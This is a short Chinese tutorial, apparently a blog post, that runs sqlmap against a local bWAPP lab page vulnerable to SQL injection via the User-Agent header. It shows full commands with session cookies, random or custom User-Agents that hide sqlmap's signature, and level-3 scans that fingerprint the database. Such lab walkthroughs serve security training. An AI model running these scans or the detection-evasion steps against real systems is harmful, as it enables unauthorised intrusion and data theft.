文章目录
- 1.使用sqlmap自带UA头的检测
- 2.使用sqlmap随机提供的UA头
- 3.使用自己写的UA头
- 4.调整level检测
测试环境:bWAPP SQL Injection - Stored (User-Agent)
1.使用sqlmap自带UA头的检测
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --batch
然后刷新看网页,发现使用了sqlmap自带的UA头
2.使用sqlmap随机提供的UA头
加入–random-agent参数
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --random-agent --batch
再看网页,可以发现已经没有sqlmap的字样了
3.使用自己写的UA头
使用–user-agent="1234567"自己给他指定UA头
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --user-agent=“1234567” --batch
再看页面变化,已经变成了我们指定的UA头了
4.调整level检测
由于sqlmap默认level不支持ua注入,需调整至level=3才能检测到ua头
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --batch -f -b --dbs --level 3
可以发现已经可以找到注入点,使用-f -b可以更详细的找出环境系统版本